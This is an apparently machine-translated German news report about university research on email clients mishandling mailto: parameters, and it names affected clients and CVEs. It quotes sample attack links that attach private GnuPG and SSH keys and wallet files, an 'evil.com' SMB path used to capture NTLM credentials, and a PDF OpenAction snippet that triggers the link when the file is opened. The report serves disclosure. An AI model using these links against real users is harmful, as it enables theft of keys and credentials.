Forscher der Ruhr-Universität Bochum (Deutschland) () Verhalten von E-Mail-Clients bei der Verarbeitung von „mailto:“-Links mit erweiterten Parametern. Fünf der zwanzig untersuchten E-Mail-Clients waren anfällig für einen Angriff, der die Ressourcenersetzung mithilfe des „attach“-Parameters manipulierte. Weitere sechs E-Mail-Clients waren anfällig für einen PGP- und S/MIME-Schlüsselaustauschangriff, und drei Clients waren anfällig für einen Angriff, bei dem der Inhalt verschlüsselter Nachrichten extrahiert wurde.
Links «„werden verwendet, um das Öffnen eines E-Mail-Clients zu automatisieren, um einen Brief an den im Link angegebenen Adressaten zu schreiben. Neben der Adresse können Sie im Rahmen des Links weitere Parameter angeben, etwa den Betreff des Briefes und eine Vorlage für typische Inhalte. Der vorgeschlagene Angriff manipuliert den Parameter „attach“, der es Ihnen ermöglicht, einen Anhang an die generierte Nachricht anzuhängen.
Die E-Mail-Clients Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) und Pegasus Mail waren anfällig für einen trivialen Angriff, der Ihnen das automatische Anhängen ermöglicht jede lokale Datei, angegeben über einen Link wie „mailto:?attach=path_to_file“. Die Datei wird ohne Warnung angehängt, sodass der Benutzer ohne besondere Aufmerksamkeit möglicherweise nicht bemerkt, dass der Brief mit einem Anhang gesendet wird.
Verwenden Sie beispielsweise einen Link wie „mailto:[E-Mail geschützt] &subject=Title&body=Text&attach=~/.gnupg/secring.gpg" können Sie private Schlüssel aus GnuPG in den Brief einfügen. Sie können auch den Inhalt von Krypto-Wallets (~/.bitcoin/wallet.dat), SSH-Schlüsseln (~/.ssh/id_rsa) und allen für den Benutzer zugänglichen Dateien senden. Darüber hinaus können Sie mit Thunderbird mithilfe von Konstrukten wie „attach=/tmp/*.txt“ Gruppen von Dateien per Maske anhängen.
Einige E-Mail-Clients verarbeiten neben lokalen Dateien auch Links zum Netzwerkspeicher und Pfade im IMAP-Server. Insbesondere ermöglicht IBM Notes Ihnen, eine Datei aus einem Netzwerkverzeichnis zu übertragen, wenn Links wie „attach=\\evil.com\dummyfile“ verarbeitet werden, sowie NTLM-Authentifizierungsparameter abzufangen, indem Sie einen Link an einen vom Angreifer kontrollierten SMB-Server senden (Die Anfrage wird mit den aktuellen Authentifizierungsparametern des Benutzers gesendet).
Thunderbird verarbeitet erfolgreich Anfragen wie „attach=imap:///fetch>UID>/INBOX>1/“, mit denen Sie Inhalte aus Ordnern auf dem IMAP-Server anhängen können. Gleichzeitig werden aus IMAP abgerufene, über OpenPGP und S/MIME verschlüsselte Nachrichten vor dem Versand automatisch vom Mail-Client entschlüsselt. Die Entwickler von Thunderbird waren über das Problem im Februar und in der Ausgabe Das Problem wurde bereits behoben (Thunderbird-Zweige 52, 60 und 68 bleiben anfällig).
Alte Versionen von Thunderbird waren außerdem anfällig für zwei weitere von den Forschern vorgeschlagene Angriffsvarianten auf PGP und S/MIME. Insbesondere Thunderbird sowie OutLook, PostBox, eM Client, MailMate und R2Mail2 waren Gegenstand eines Key-Replacement-Angriffs, der dadurch verursacht wurde, dass der Mail-Client automatisch neue Zertifikate importiert und installiert, die in S/MIME-Nachrichten übertragen werden, was dies ermöglicht Der Angreifer kann den Austausch bereits vom Benutzer gespeicherter öffentlicher Schlüssel organisieren.
Der zweite Angriff, für den Thunderbird, PostBox und MailMate anfällig sind, manipuliert die Funktionen des Mechanismus zum automatischen Speichern von Nachrichtenentwürfen und ermöglicht es, mithilfe von Mailto-Parametern die Entschlüsselung verschlüsselter Nachrichten oder das Hinzufügen einer digitalen Signatur für beliebige Nachrichten zu initiieren anschließende Übermittlung des Ergebnisses an den IMAP-Server des Angreifers. Bei diesem Angriff wird der Chiffretext über den „body“-Parameter übertragen und das „Meta Refresh“-Tag wird verwendet, um einen Anruf an den IMAP-Server des Angreifers zu initiieren. Zum Beispiel: ' '
Um „mailto:“-Links ohne Benutzerinteraktion automatisch zu verarbeiten, können speziell gestaltete PDF-Dokumente verwendet werden – die OpenAction-Aktion in PDF ermöglicht es Ihnen, den Mailto-Handler beim Öffnen eines Dokuments automatisch zu starten:
%PDF-1.5
1 0 Objekt
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 0 Objekt
<< /Type /Action /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[…])>>
endobj
Source: opennet.ru